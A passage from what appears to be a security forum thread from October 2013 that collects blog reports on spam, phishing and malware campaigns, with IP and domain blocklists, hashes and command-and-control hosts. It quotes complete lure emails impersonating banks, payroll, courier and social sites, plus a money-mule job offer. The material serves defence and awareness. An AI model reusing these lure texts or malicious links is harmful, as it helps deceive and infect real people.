Fake Business Complaint Notification Email Messages - 2013 Oct 07
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2013-10-08, 14:24
FYI...

Fake Well Fargo SPAM - malicious attachment / lasub-hasta .com
- http://blog.dynamoo.com/2013/10/fake-well-fargo-spam-comes-with.html
8 Oct 2013 - "This fake Wells Fargo spam is a retread of this one*, but comes with a slightly different attachment:
Date: Mon, 7 Oct 2013 19:56:29 +0100 [10/07/13 14:56:29 EDT]
From: "Harry_Buck@ wellsfargo .com" [Harry_Buck@ wellsfargo .com]
Subject: Documents - WellsFargo
Please review attached files.
Harry_Buck
Wells Fargo Advisors
817-487-2882 office
817-683-6287 cell Harry_Buck@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

Attached is a ZIP file containing a malicious EXE file. The VirusTotal detection rate is a fairly healthy 27/48**. Automated analysis... shows that the malware tries to phones home to lasub-hasta .com on 205.251.152.178 (Global Net Access, US). A quick look at that server shows that it has several hundred sites on, most of which are probably legitimate.. but there is a great deal of suspect activity*** on this server which you might want to take into account if you are thinking of -blocking- this IP."
* http://blog.dynamoo.com/2013/09/wells-fargo-important-documents-spam.html

** https://www.virustotal.com/en-gb/file/eab00b325890f6a92f9e4888b7f394732760d0ccf36095731a1b5764c6fa79d3/analysis/1381222163/

*** https://www.virustotal.com/en-gb/ip-address/205.251.152.178/information/
___

Spoofed APEC 2013 email mixes old threat tricks
- http://blog.trendmicro.com/trendlabs-security-intelligence/spoofed-apec-2013-email-mixes-old-threat-tricks/
Oct 8, 2013 - "... threat actors have found another high-profile political event to leverage their schemes. The APEC 2013 Summit – an annual meeting of 21 Pacific Rim countries – in Indonesia can be the perfect veil for their spoofed emails. The threat arrives as an email purportedly from “Media APEC Summit 2013” containing two attached Excel files. The sender, message and the recipients of the email lead us to believe that this threat is aimed at individuals who would be interested in the summit (both attendees and non-attendees).
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/apec-summit-email.jpg
... the email contains two attachments. Both are disguised as “APEC media list”, however only one of them (APEC Media List 2013 Part 1) was found malicious. The other, non-malicious file serves as a decoy document. Based on our analysis, the malware exploits an old Microsoft Office vulnerability (CVE-2012-0158*), an old vulnerability that was also exploited in other targeted attacks... This malware then triggers a series of multiple malware dropping and connects to various command-and-control (C&C) servers. Once done, the exploit drops and executes the file dw20.t. The said file is a dropper, which drops another file in C:\Program Files\Internet Explorer\netidt.dll. This dropped file also communicates to specific C&C servers and sends/receives encrypted data containing system information and infection status. This allows netidt.dll to download the executable _dwr6093.exe. This malware is another dropper that drops and executes downlink.dll. This final dropper leads to the final payload (netui.dll and detected as BKDR_SEDNIT.SM) and responsible for its automatic execution (by creating autostart registry entries). BKDR_SEDNIT.SM steals information via logging keystrokes and executes commands from its C&C servers. The malicious actors behind this threat can then use the malware to gather exfiltrate important data, leading to serious repercussions to the targeted parties..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
Last revised: 03/07/2013 - "... triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability"..."
___

Fake "Voicemail" SPAM ...
- http://www.threattracksecurity.com/it-blog/kuluoz-voicemail-spam-drops-signed-certificate-winwebsec/
Oct 7, 2013 - "... fake WhatsApp email messages leading to various forms of mobile infection. Over the last day or so, our Labs have noticed a shift into other realms – namely, Fake AV. Whenever we see Kuluoz, it is typically using compromised boxes to host payloads – and those payloads are usually Winwebsec and Medfos. Fake emails are the name of the game, and as you can see the run the full range of wedding invites, airline spam, DHL / Fedex notifications and more besides. In this case, we begin with the now familiar WhatsApp spam email messages:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/winwebsec0.jpg
Instead of links taking end-users to malicious mobile downloads, they’ll be taken to a .biz.ua URL offering up a Kuluoz.B executable file which will download WinWebSec onto the target PC. Winwebsec has been signed by a valid cert, which is increasingly becoming a problem where Malware is concerned. The Winwebsec variant is fairly recent, dating from mid to late August. It downloads Fareit and Ursnif, which are both infostealers (of course, the Fake AV – called Antivirus Security Pro – will try to convince end-users to pay up for non-existent infection removal. It will completely ignore the genuine infections dropped on the PC, but you wouldn’t expect anything less really).
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/winwebsec1.jpg
... At time of writing, Virustotal has the Kuluoz pegged at 16/48... VIPRE Antivirus will find it is detected as Trojan.Win32.Generic.pak!cobra. Fake voicemail messages are a great way for scammers to target individuals and corporations, especially if sent to less technologically inclined victims. Expect the payloads of these spam messages to keep changing, and be very wary of running any executable files sent via email – no matter how tempting the supposed message waiting for you is..."
___

Verizon Wireless Picture Messaging Spam
- http://threattrack.tumblr.com/post/63468757888/verizon-wireless-picture-messaging-spam
Oct 8, 2013 - "Subjects Seen:
No Subject
Typical e-mail details:
This message was sent using the Picture and Video Messaging service from Verizon Wireless!

Malicious File Name and MD5:
<random>Img_Picture.zip (0FF888E38099617CBD03451DA72F5FC4)
<random>Img_Picture.jpeg.exe
(67355A28A8EA584D0A08F17BE10E251E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f33ac38030657107b6232750e43bcf1f/tumblr_inline_mucv43J0sn1r6pupn.png
___

Mileage Reimbursement Form Spam
- http://threattrack.tumblr.com/post/63473640689/mileage-reimbursement-form-spam
Oct 8, 2013 - "Subjects Seen:
Annual Form - Authorization to Use Privately Owned Vehicle on State Business
Typical e-mail details:
All employees need to have on file this form STD 261 (attached). The original is retained by supervisor and copy goes to Accounting. Accounting need this form to approve mileage reimbursement.
The form can be used for multiple years, however it needs to re-signed annually by employee and supervisor.
Please confirm all employees that may travel using their private car on state business (including training) has a current STD 261 on file. Not having a current copy of this form on file in Accounting may delay a travel reimbursement claim.

Malicious File Name and MD5:
Form_<e-mail domain>.zip (00D3C33F37DEE0B3AB933C968BE8043A)
Form_20130810.exe
(6828091CBF4AACEC10195EDBFA804FA7)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/26e9269e0b0f01eb8c891d2c35692e8a/tumblr_inline_mucyp5HE2x1r6pupn.png

:mad: :fear:

AplusWebMaster
2013-10-09, 18:10
FYI...

Fake Business form SPAM / warehousesale .com .my
- http://blog.dynamoo.com/2013/10/annual-form-authorization-to-use.html
9 Oct 2013 - "This oddly-themed spam has a malicious attachment:
Date: Tue, 8 Oct 2013 11:49:49 -0600 [10/08/13 13:49:49 EDT]
From: Waldo Reeder [Waldo@ victimdomain .com]
Subject: Annual Form - Authorization to Use Privately Owned Vehicle on State Business
All employees need to have on file this form STD 261 (attached). The original is
retained by supervisor and copy goes to Accounting. Accounting need this form to approve
mileage reimbursement.
The form can be used for multiple years, however it needs to re-signed annually by
employee and supervisor.
Please confirm all employees that may travel using their private car on state business
(including training) has a current STD 261 on file. Not having a current copy of this
form on file in Accounting may delay a travel reimbursement claim.

The is a ZIP file attached which includes the victim's domain name as part of the filename. Inside is an exectuable file with an icon to make it look like a PDF file, and the date is encoded into the filename. VirusTotal detections are not bad at 25/48*. Automated analysis... shows an attempted connection to warehousesale .com .my hosted on 42.1.61.90 (Exa Bytes Network, Malaysia). There are no other sites on that server that I can see and I recommend that you -block- both the IP and domain as a precaution.
Recommended blocklist:
warehousesale .com .my
42.1.61.90"
* https://www.virustotal.com/en-gb/file/2c3c1cbe50fdeecf665faf00cadff094c08f49000c96b57983546c1db197038c/analysis/1381305964/
File name: Form_20130810.exe

- https://www.virustotal.com/en-gb/ip-address/42.1.61.90/information/
___

Fake GMail emails lead to pharmaceutical scams
- http://www.webroot.com/blog/2013/10/09/fake-4-missed-emails-gmail-themed-emails-lead-pharmaceutical-scams/
Oct 9, 2013 - "Pharmaceutical scammers are currently mass mailing tens of thousands of fake emails, impersonating Google’s GMail in an attempt to trick its users into clicking on the links found in the spamvertised emails. Once users click on them, they’re automatically exposed to counterfeit pharmaceutical items, with the scammers behind the campaign attempting to capitalize on the ‘impulsive purchase’ type of social engineering tactic typical for this kind of campaign.
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Email_Spam_Spamvertised_Fake_GMail_Pharmaceutical_Scams_01.png
Sample screenshot of the landing pharmacautical scams page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Email_Spam_Spamvertised_Fake_GMail_Pharmaceutical_Scams.png
... Landing URL: shirazrx .com – 85.95.236.188 – Email: ganzhorn@ shirazrx .com ... pharmaceutical scam domains are also known to have responded to the same IP (85.95.236.188)... This isn’t the first, and definitely not the last time pharmaceutical scammers brand-jack reputable brands in order to trick users into clicking on the links found in the fake emails, as we’ve already seen them brand-jack Facebook’s Notification System, YouTube, as well as the non-existent Google Pharmacy. Thanks to the (natural) existence of affiliate networks for pharmaceutical items, we expect that users will continue falling victim to these pseudo-bargain deals, fueling the the growth of the cybercrime economy. Our advice? Never bargain with your health, spot the scam and report it."

- https://www.virustotal.com/en-gb/ip-address/85.95.236.188/information/

:mad: :fear:

AplusWebMaster
2013-10-10, 16:15
FYI...

Malware served up by Bad Bing Ads
- http://www.threattracksecurity.com/it-blog/sirefef-malware-served-bad-bing-ads/
Oct 10, 2013 - "We’re seeing our old friend “rogue ads in Bing” doing the rounds – should you go searching for “Youtube” and click on the rogue ad (in this case, the one in the bottom right hand corner under “Ads related to Youtube”) you’ll be taken to a site which redirects to an exploit.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/bingexploit1.png
The scammers behind this could well be targeting other keywords... The exploit attempts to drop Sirefef, which we’ve seen being used in malicious Bing adverts back in March 2013..."
___

Fake Payroll Intuit email
- http://security.intuit.com/alert.php?a=89
10/10/13 - "Here is a copy of the phishing email people are receiving. Be sure -not- to click any links in the email.

Dear,
We received your payroll on October 9, 2013 at 4:59 PM .
Attached is a copy of your Remittance. Please click on the attachment in order to view it.
Please note the deadlines and status instructions below:
If your payroll is received BEFORE 5 p.m., your Direct Deposit employees will be paid two (2) banking days from the date received or on your paycheck date, whichever is later.
If your payroll is received AFTER 5 p.m., your employees will be paid three (3) banking days from the date received or on your paycheck date, whichever is later.
YOUR BANK ACCOUNT WILL BE DEBITED THE DAY BEFORE YOUR CHECKDATE.
Funds are typically withdrawn before normal banking hours so please make sure you have sufficient funds available by 12 a.m. on the date funds are to be withdrawn.
Intuit must receive your payroll by 5 p.m., two banking days before your paycheck date or your employees will not be paid on time.
Intuit does not process payrolls on weekends or federal banking holidays. A list of federal banking holidays can be viewed at the Federal Reserve website.
Thank you for your business.
Sincerely,
Intuit Payroll Services
__
This is the end of the fake email.
Steps to Take Now:
Do -not- open the attachment in the email...
Delete the email..."
___

Fake 'Companies House' SPAM
- http://blog.dynamoo.com/2013/10/companies-house-phish.html
10 Oct 2013 - "This fake Companies House spam appears to be some sort of phishing attempt:
Date: Thu, 10 Oct 2013 11:57:31 +0300 [04:57:31 EDT]
From: Companies House [contact@ companieshouse .co .uk]
Subject: Compulsory Companies House WebFiling Update #90721
Compulsory Companies House WebFiling Update #90721
This is an important notice to inform you as a registered company to update your details.
This will make it easier to update our database and keep records of our company...

Screenshot: https://lh3.ggpht.com/-KaNlD25nUrA/UlambOUdY_I/AAAAAAAACDw/E6Hgxigjzlk/s1600/companies-house-1.png

The link in the email goes to [phish]www.misspanama .net/respaldo/ukcompany/CompaniesHouse.htm which asks only for a Company Name, email address and password.
> https://lh3.ggpht.com/-1wLNfJ2PxG8/Ulanw6MaEJI/AAAAAAAACD8/VSykobTiQn4/s1600/companies-house-2.png
Once the credentials have been harvested, the victim is sent to a genuine Companies House webpage at www.companieshouse .gov .uk/forms/introduction.shtml
> https://lh3.ggpht.com/-5V2piX6jidM/UlaoEJYJiPI/AAAAAAAACEE/M64-umwPBtc/s1600/companies-house-3.png
So, what is being harvested here? There seems to be no malware involved, so perhaps the bad guys are actually trying to hijack company identities for some evil purpose. It turns out that Companies House have a webpage all about this type of threat and recommend that you forward offending emails to phishing@companieshouse .gov .uk. Just remember.. sometimes phishers are after something a lot less obvious than your bank details!"

:mad: :fear:

AplusWebMaster
2013-10-11, 13:22
FYI...

Fake Facebook App - Phishers Use Malware
- http://www.symantec.com/connect/fr/blogs/phishers-use-malware-fake-facebook-app
9 Oct 2013 - "Phishers frequently introduce -bogus- applications to add new flavor into their phishing baits... In this particular scam, phishers were trying to steal login credentials, but their means of data theft wasn’t with the phishing bait alone. Their ploy also used malware for harvesting users’ confidential information. The phishing site spoofed the login page of Facebook and was hosted on a free web hosting site.
> http://www.symantec.com/connect/sites/default/files/users/user-2935611/figure1_0.png
The phishing site boasted that the application would enable users to view a list of people who visited their profile page. The site offered two options to activate the fake app. The first option was by downloading software containing the malware and the second was by entering user credentials and logging into Facebook. A message on the phishing page encouraged users to download the software that would allegedly send notifications to the user when someone visited their Facebook profile. If the download button was clicked, a file download prompt appeared. The file contained malicious content detected by Symantec as Infostealer. On the other hand, if user credentials were entered, the phishing site -redirected- to a legitimate Facebook page... If users fell victim to the phishing site by entering their login credentials, the phishers would have successfully stolen their information for identity theft purposes..."
___

Twitter still being used by Hacks...
- http://blog.trendmicro.com/trendlabs-security-intelligence/twitter-still-being-used-by-shady-hackers/
Oct 10, 2013 - "... Twitter said it has 218 million monthly active users, three-quarters of which have accessed the site from a mobile device. It’s not a surprise that some of these users are malicious. What is uncommon is that some of these malicious accounts do try to “engage” with other accounts – even those of security vendors like Trend Micro... Recently, we came across four accounts that added the @TrendLabs Twitter account to various lists. This would not have been unusual, except -all- four accounts were clearly malicious:
Accounts/lists added:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/twitter-list.png
Upon further investigation, these accounts led to more malicious sites offering a variety of hacking tools targeting sites like Facebook and Twitter, as well as a scam site offering free iPhone 5s...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/10/twitter-tool.jpg
It’s highly likely that these malicious sites are scam sites, offering none of the supposed “tools” that are on offer. Cybercriminals are not below stealing from other would-be online crooks and attackers as well. Unfortunately, this is not the first (or the last) threat that we can encounter on popular social networking sites. Previously, incidents like survey scams, rogue apps, and other threats were frequent, although recent improvements by these sites were able to keep these threats at bay. However, as the popularity of mobile devices grew, cybercrmininals have found a new platform to use in their schemes. Just recently, we found a fake Facebook mobile page* that asks users to disclose credit card details. Cybercriminals may either sell or use these to initiate unauthorized transactions. We advise would-be “curious” users to avoid these sites and profiles completely, and if possible to report these accounts to site administrators (if possible, using the automated block/report features of these services)..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/fake-facebook-mobile-page-steals-credit-card-details/

:mad: :fear::fear:

AplusWebMaster
2013-10-14, 19:42
FYI...

Phish take to the Skies
- http://www.threattracksecurity.com/it-blog/flying-blue-phish-takes-skies/
Oct 14, 2013 - "FlyingBlue, the frequent flyer program of Air France and KLM, are sending emails to members warning of a phishing campaign...
“Some Flying Blue members report receiving an e-mail in which they are advised to secure their “Air France-KLM account” by clicking on a link and logging into the “secured Flying Blue network”. This e-mail was not sent by AIR FRANCE, KLM or Flying Blue. Do not log in using this link. Please make sure that you only log into your Flying Blue account if you are in the trusted Flying Blue environment. If you clicked on a link in the fake Flying Blue e-mail, we advise you to check your account now. If you cannot access your account, please contact the Flying Blue Service Centre.”
You can see what one of the phish pages looked like, courtesy of Urlquery(dot)net*.
“We need to verify your email address to confirm you are the owner of this account. In order to protect your privacy, we will never store your password or send emails without your consent”
It seems likely they were after email accounts at a minimum and email & airmiles accounts at a maximum, with airmiles being particularly useful to scammers the World over. We don’t need to tell you how bad it would be to have your email address compromised (or maybe we do!) but many would overlook the significance of having their airmiles targeted. Whether you collect them for business, pleasure or both you should be cautious of -any- emails asking you to login to confirm details. If in doubt, always type the URL into your browser and visit a site directly rather than click blindly and hope for the best. You can see a little more information about the scam currently in circulation by reading the notice on the Flying Blue homepage**..."
* https://urlquery.net/report.php?id=6411611

** http://www.flyingblue.com/news/1603/warning-beware-of-phishing-attempts-in-fake-flying-blue-e-mails.html

> https://urlquery.net/screenshot.php?id=6411611

- https://www.virustotal.com/en/ip-address/5.9.87.109/information/

- http://google.com/safebrowsing/diagnostic?site=AS:24940
___

Fake T-Mobile themed emails ...
- http://www.webroot.com/blog/2013/10/14/spamvertised-t-mobile-picture-id-typemms-themed-emails-lead-malware/
Oct 14, 2013 - "The cybercriminals behind last week’s profiled fake T-Mobile themed email campaign* have resumed operations, and have just spamvertised another round of tens of thousands of malicious emails impersonating the company, in order to trick its customers into executing the malicious attachment, which in this case is once again supposedly a legitimate MMS notification message. Detection rate for the spamvertised attachment: MD5: 8a9abe065d473da9527fdf08fb55cb9e ** ... Trojan.DownLoader9.22851; UDS:DangerousObject.Multi.Generic
Once executed, the sample creates the following Mutexes on the affected hosts:
CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004 / ShimCacheMutex / 85485515
It then (once again) phones back to networksecurityx.hopto .org. The most recent MD5 (MD5: 014543ee64491bac496fabda3f1c8932***) that has phoned back to the same C&C server (networksecurityx.hopto .org) is also known to have phoned back to dahaka.no-ip .biz (89.136.186.200)..."
* https://www.webroot.com/blog/2013/10/02/t-mobile-mms-message-arrived-themed-emails-lead-malware/

** https://www.virustotal.com/en/file/6769e4686aa701956d90a5e850d1f795a2db5c71f6a94c410d40b6596aee09ad/analysis/

*** https://www.virustotal.com/en/file/556140429ad90142a2f29ffdd63d68378a38f9c7b5dbf74ae3b08c4f825f1f3a/analysis/

:mad: :fear:

AplusWebMaster
2013-10-15, 19:29
FYI...

Fake USPS SPAM / Label_ZFRLOADD5PGGZ0Z_USPS.zip
- http://blog.dynamoo.com/2013/10/usps-spam-labelzfrloadd5pggz0zuspszip.html
15 Oct 2013 - "This fake USPS spam has a malicious attachment:
Date: Tue, 15 Oct 2013 09:36:02 -0500 [10:36:02 EDT]
From: USPS Express Services [service-notification@ usps .com]
Subject: USPS - Missed package delivery
Notification
Our company's courier couldn't make the delivery of package.
REASON: Postal code contains an error.
DELIVERY STATUS: Sort Order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: USPSZFRLOADD5PGGZ0Z
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.
An additional information:
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.

There is an attachment Label_ZFRLOADD5PGGZ0Z_USPS.zip which contains a malicious executable Label_101513_USPS.exe (note the date encoded into the filename). VirusTotal shows just 4/46* vendors detect it at present. Automated analysis... shows an attempted communication with traderstruthrevealed .com on 103.8.27.82 (SKSA Technology, Malaysia). There is also another email using this format with the same payload."
Recommended blocklist:
103.8.27.82
traderstruthrevealed .com"
* https://www.virustotal.com/en-gb/file/b0a7f2a03b6718ed522dc3bc63ee43e31823132ba69ea5e7b62740c7d38d0242/analysis/1381850132/

- https://www.virustotal.com/en-gb/ip-address/103.8.27.82/information/
___

Fake Intuit SPAM / payroll_report_147310431_10112013.zip
- http://blog.dynamoo.com/2013/10/payroll-received-by-intuit-spam.html
15 Oct 2013 - "This fake Intuit spam comes with a malicious attachment:
Date: Tue, 15 Oct 2013 16:20:40 +0000 [12:20:40 EDT]
From: Intuit Payroll Services IntuitPayrollServices@ payrollservices.intuit .com]
Subject: Payroll Received by Intuit
Dear, [redacted]
We received your payroll on October 11, 2013 at 4:41 PM .
Attached is a copy of your Remittance. Please click on the attachment in order to view it.
Please note the deadlines and status instructions below: If your payroll is received
BEFORE 5 p.m., your Direct Deposit employees will be paid two (2) banking days from the
date received or on your paycheck date, whichever is later. If your payroll is received
AFTER 5 p.m., your employees will be paid three (3) banking days from the date received
or on your paycheck date, whichever is later. YOUR BANK ACCOUNT WILL BE DEBITED THE DAY
BEFORE YOUR CHECKDATE. Funds are typically withdrawn before normal banking hours so
please make sure you have sufficient funds available by 12 a.m. on the date funds are to
be withdrawn. Intuit must receive your payroll by 5 p.m., two banking days before your
paycheck date or your employees will not be paid on time. Intuit does not process
payrolls on weekends or federal banking holidays. A list of federal banking holidays can
be viewed at the Federal Reserve website. Thank you for your business.
Sincerely, Intuit Payroll Services...

The attachment is payroll_report_147310431_10112013.zip which in turn contains payroll_report_10112013.exe (note the date is encoded into those files). That executable currently has a detection rate of 9/46* at VirusTotal. Automated analysis shows that it attempt to make a connection to mtfsl .com on 184.22.215.50 (Network Operations Center, US). Blocking those temporarily may give some protection against any additional threats using that server."
* https://www.virustotal.com/en/file/b2b5f9ea3202520e4a1c75b2500dc200cda9158034d83bd98963ac93e4681aff/analysis/1381861232/

- https://www.virustotal.com/en/ip-address/184.22.215.50/information/

:mad: :fear:

AplusWebMaster
2013-10-17, 04:24
FYI...

Fake Pinterest SPAM - alenikaofsa .ru
- http://blog.dynamoo.com/2013/10/your-facebook-friend-andrew-hernandez.html
16 Oct 2013 - "This fake Pinterest spam leads to a malicious download on alenikaofsa .ru:
Date: Wed, 16 Oct 2013 12:03:11 -0300 [11:03:11 EDT]
From: Pinterest [pinbot@ pinterest .biz]
Subject: Your Facebook friend Andrew Hernandez joined Pinterest
A Few Updates...
[redacted]
Andrew Hernandez
Your Facebook friend Andrew Hernandez just joined Pinterest. Help welcome Carol to the community!
Visit Profile
Happy pinning! ...

Screenshot: https://lh3.ggpht.com/-1wTZhiRwP5o/Ul7ovSINeHI/AAAAAAAACGY/N8QUzfcsIhw/s1600/pinterest2.png

... The link in the email goes through a legitimate hacked site and then ends up on a fake browser download page (report here*) that attempts to download [donotclick]alenikaofsa .ru:8080/ieupdate.exe which has a VirusTotal detection rate of just 1/48** (only Kaspersky detects it.. again)... alenikaofsa .ru is registered to the infamous Russian "private person" and is hosted on the following IPs:
62.75.246.191 (Intergenia AG, Germany)
69.46.253.241 (RapidDSL & Wireless, US)
The domain alionadorip .ru is also hosted on these IPs. What's interesting is that 69.46.253.241 was seen here months ago, which makes this look like the unwelcome return of the RU:8080 gang after a long absence.
Recommended blocklist:
62.75.246.191
69.46.253.241
alenikaofsa .ru
alionadorip .ru
Footnote:
The malware page uses a similar script to that used here*** although with the rather cheeky comment
// It's "cool" to let user wait 2 more seconds :/ ..."
* http://urlquery.net/report.php?id=6856407

** https://www.virustotal.com/en/file/807f43d9649976a3ac7bc4b2506947ccedea2235eb80ac69a8246fb2b8c1a1b4/analysis/1381951170/

*** http://blog.dynamoo.com/2013/09/aicpa-spam-children-bicyclenet.html
___

Fake LinkedIn SPAM / Contract_Agreement_whatever.zip
- http://blog.dynamoo.com/2013/10/linkedin-spam-contractagreementwhatever.html
16 Oct 2013 - "This fake LinkedIn spam has a malicious attachment:
Date: Wed, 16 Oct 2013 11:57:55 -0600 [13:57:55 EDT]
From: Shelby Gordon [Shelby@ linkedin .com]
Attached is your new contract agreements.
Please read the notes attached, then complete, sign and return this form.
Shelby Gordon
Contract Manager
Online Division - LinkedIn
Shelby.Gordon@ linkedin .com ...

The attachment has the format Contract_Agreement_recipientname.zip and in turn contains a malicious executable Contract_Agreement_10162013.exe (note the date encoded into the filename). VirusTotal detections are 10/48*. Automated analysis tools... show an attempted connection to miamelectric .com on 209.236.71.58 (Westhost, US). I recommend that you block outbound traffic to that particular domain."
* https://www.virustotal.com/en/file/67762ad4b6bdf79eb52256e699a1409a1671c4581dcdaea70704c6c485e93797/analysis/1381954740/
___

Fake job offer - Atlantics Post LLC
- http://blog.dynamoo.com/2013/10/atlantics-post-llc-fake-job-offer.html
16 Oct 2013 - "A bit of Money Mule recruiting that isn't really trying very hard..
Date: Wed, 16 Oct 2013 14:54:34 -0300 [13:54:34 EDT]
From: Atlantics Post [misstates7@ compufort .com]
Subject: Career with Atlantics Post LLC
Atlantics Post LLC is now hiring for a Shipping Clerk. If You are young, enthusiastic person. Looking for a great job opportunity with a stable in come this job is for you.
Duties:
Receive packages at workplace (out of home possition);
Transfer the packages to our business partners nationwide;
Keeping accurate records of operations and report them
Requirements:
- Thorough knowledge of quality improvement techniques and experience with process and service delivery improvement.
- Strong ability to analyze, organize and simplify complex processes and data.
- Exceptional attention to detail.
- Considerable experience with data reporting systems.
- Leisure business experience an asset.
- Flexible, adaptable to change, and resourceful in the face of shifting priorities and demands ...
Originating IP is 181.165.70.97 in Argentina. Avoid."

:fear: :mad:

AplusWebMaster
2013-10-17, 12:45
FYI...

Flash exploits, Fake browser updates - Mass iFrame injection campaign...
- http://www.webroot.com/blog/2013/10/17/mass-iframe-injection-campaign-leads-adobe-flash-exploits/
Oct 17, 2013 - "We’ve intercepted an ongoing malicious campaign, relying on injected/embedded iFrames at Web sites acting as intermediaries for a successful client-side exploits to take place... a social engineering campaign pushing fake browser updates... iFrame URL: mexstat210 .ru – 88.198.7.48 ... Sample detection rate for the malicious script: MD5: efcaac14b8eea9b3c42deffb42d59ac5 * ... Trojan-Downloader.JS.Expack.sn; Trojan:JS/Iframe.BS ... malicious MD5s are also known to have been hosted on the same IP (88.198.7.48)... Client-side exploits serving URL: urkqpv.chinesenewyeartrendy .biz:39031/57e2a1b744927e0446aef3364b7554d2.html – 198.50.225.114
Domain name reconnaissance: chinesenewyeartrendy .biz - 46.105.166.96 known to have responded to the same IP is also appearancemanager .biz ...
... the iFrame injected/embedded URL includes a secondary iFrame pointing to a, surprise, surprise, Traffic Exchange network. Not surprisingly, we also identified a related threat that is currently using the same infrastructure as the official Web site of the Traffic Exchange.
> https://www.webroot.com/blog/wp-content/uploads/2013/10/Mass_iFrame_Injection_Traffic_EShop_Buy_Purchase_Traffic_Exploits_Malware.png
Secondary iFrame: mxdistant .com – 213.239.231.141 ... Once executed, it phones back to anyplace-gateway .info – 76.72.165.63 – info@remote-control-pc .com... Moreover, updbrowser .com is also directly related to worldtraff .ru, as it used to push fake browser updates**, similar to the MD5s at bank7 .net and ztxserv .biz..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/c15139a1f4faef6bac513dc14875482b892cb27d1d202609fa3bf4a993c3cc75/analysis/

** http://stopmalvertising.com/malware-reports/does-your-browser-really-need-that-critical-update.html

- https://www.virustotal.com/en/ip-address/213.239.231.141/information/

- https://www.virustotal.com/en/ip-address/76.72.165.63/information/

- https://www.virustotal.com/en/ip-address/46.105.166.96/information/

- https://www.virustotal.com/en/ip-address/198.50.225.114/information/

- https://www.virustotal.com/en/ip-address/88.198.7.48/information/
___

Fake Flash update serves multitude of Firefox Extensions
- http://www.threattracksecurity.com/it-blog/fake-flash-update-serves-multitude-firefox-extensions/
Oct 17, 2013 - "“Update your Flash player”, they said:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/fakeflashfirefox1.png
Specifically, “Version 11.9.900.117″ because “if you’re not using the latest version of Flash Player your version may contain vulnerabilities which can be used to attack your computer”. Above, we’re visiting updatedflashplayer(dot)com with Firefox. Running the file will offer up a wide selection of programs that don’t tend to come with what are supposed “security updates”:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/airinstall1.png
“After clicking next you will be presented with several great third party offers that can be skipped by pressing decline”
There’s no update to the latest version of Flash – merely something you can use to watch Flash videos with and a bunch of bundled programs. Here’s a few, starting with Fast Free Converter, an Adware plug-in:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/airinstall4.png
... Below you can see a typical install, with everything loaded up and ready to roll in your Firefox browser:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/installs.jpg
... As for the above “Flash Player update”, you can see some more information about it over on VirusTotal where it is currently pegged at 9/48*..."
* https://www.virustotal.com/en/file/04fbdf8f933ff6b8dd7e2d48df6fde372ce4cdd1b73bb9a44f1c9cd193b050c1/analysis/1381940695/
File name: setup.exe
Detection ratio: 9/48
___

Fake Xerox WorkCentre SPAM / A136_Incoming_Money_Transfer_Form.exe
- http://blog.dynamoo.com/2013/10/scan-from-xerox-workcentre-spam.html
17 Oct 2013 - "The malware spammers are suffering from a chronic lack of imagination with this familiar fake printer spam:
Date: Thu, 17 Oct 2013 13:01:52 -0600 [15:01:52 EDT]
From: Incoming Fax [Incoming.Fax3@ victimdomain .com]
Subject: Scan from a Xerox WorkCentre
Please download the document. It was scanned and sent to you using a Xerox multifunction device.
File Type: pdf
Download: Scanned from a Xerox multi~9.pdf
multifunction device Location: machine location not set
Device Name: Xerox1552
For more information on Xerox products and solutions, please visit http ://www .xerox .com

Attached is an executable file Scanned from a Xerox multi~6.zip which in turn contains a file A136_Incoming_Money_Transfer_Form.exe which has a VirusTotal detection rate of 6/48*. Automated analysis... shows a connection to cushinc .com on 209.236.71.58 (Westhost, US). This is the same server as seen yesterday**, so my best guess is that the server is compromised and potentially all the 600+ domains on it are too. Blocking that IP address may be prudent."
* https://www.virustotal.com/en/file/3555785d71083dd18eee762c1e2f768bfa7d4d91f6d0adbf747021a65da5a62e/analysis/1382037428/

** http://blog.dynamoo.com/2013/10/linkedin-spam-contractagreementwhatever.html

- https://www.virustotal.com/en/ip-address/209.236.71.58/information/

:mad: :fear:

AplusWebMaster
2013-10-18, 17:32
FYI...

Fake MS Update phish ...
- http://blog.dynamoo.com/2013/10/microsoft-windows-update-phish.html
18 Oct 2013 - "A random and untargeted attempt at phishing with a Windows Update twist.
From: Microsoft Office [accounts-updates@ microsoft .com]
Date: 17 October 2013 02:54
Subject: Microsoft Windows Update
Dear Customer,
Evaluation period has expired. For information on how to upgrade your windows software please Upgrade Here.
Thank you,
Copyright © 2013 Microsoft Inc. All rights reserved.

